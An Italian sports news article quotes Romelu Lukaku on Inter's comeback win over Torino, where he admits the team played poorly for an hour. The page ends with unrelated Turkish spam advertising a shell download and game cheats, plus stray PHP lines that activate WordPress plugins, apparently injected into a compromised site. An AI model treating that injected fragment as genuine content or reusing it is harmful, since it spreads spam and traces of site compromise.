Inter, Lukaku dopo il Torino: “Così non va bene”


Il gigante belga, autore di una doppietta col Torino, fa autocritica “Non siamo ancora una grande squadra” e suona la carica “dobbiamo lavorare di più perché non abbiamo giocato una grande partita”

Lukaku, con la sua doppietta, è stato il grande protagonista della rimonta dell’Inter sul Toro. Ma il gigante belga fa autocritica e ai microfoni di Dazn: “Non siamo ancora una grande squadra, non va bene essere così in difficoltà. Abbiamo giocato per 60′ veramente male, eravamo in difficoltà, senza cattiveria e senza voglia. Poi dopo ci siamo svegliati e abbiamo vinto, questo è la cosa importante”.

Il gigante umile

—  

“Io leader? Abbiamo tanti giocatori importanti, io sono solo uno dei 25 in questo spogliatoio che vuole aiutare questa squadra a vincere. Ma dobbiamo lavorare di più perché non abbiamo giocato una grande partita – ha proseguito -. I miei gol? Sto crescendo, cerco sempre di migliorare ogni giorno e ogni settimana per essere veramente un giocatore di alto livello, un fuoriclasse. I fuoriclasse però aiutano le squadre a vincere, io lavoro per questo”.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );